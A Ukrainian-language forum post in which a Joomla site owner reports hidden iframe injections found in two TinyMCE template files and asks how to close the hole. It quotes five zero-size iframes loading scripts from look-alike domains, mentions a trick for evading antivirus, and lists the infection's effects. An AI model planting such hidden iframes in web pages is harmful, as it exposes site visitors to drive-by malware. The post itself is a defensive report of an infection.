Виявилося, що в файлах
/plugins\editors\tinymce\jscripts\tiny_mce\themes\advanced\anchor.htm
/plugins\editors\tinymce\jscripts\tiny_mce\themes\advanced\link.htm
знайшов ось таке
...
</html>
<iframe src="хттп://yahoo-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="хттп://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="хттп://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="хттп://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="хттп://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
тільки іфрейми однією стрічкою (що характерно, якщо не однією стрічкою - антивірус не бере), і звісно ж хттп як http.
Отут прочитав http://benmay.org/web-design-info/joomla-iframe-injection-hack що це хак і заражено багато файлів.
Наслідки:
- сторінки блокуються антивіром (і не тільки поп-апи), тобто деякий денай оф сервіс
- тормозить при формуванні сторінок
- реалізована заготовка для закачування вредоносного коду
Хто знає де в джумлі проблема і як цю дірку заліпити ?
P.S. сайт у грудні було оновлено до останньої версії 1.5.8, але цей апдейт не заміщує файлів що заражено.


).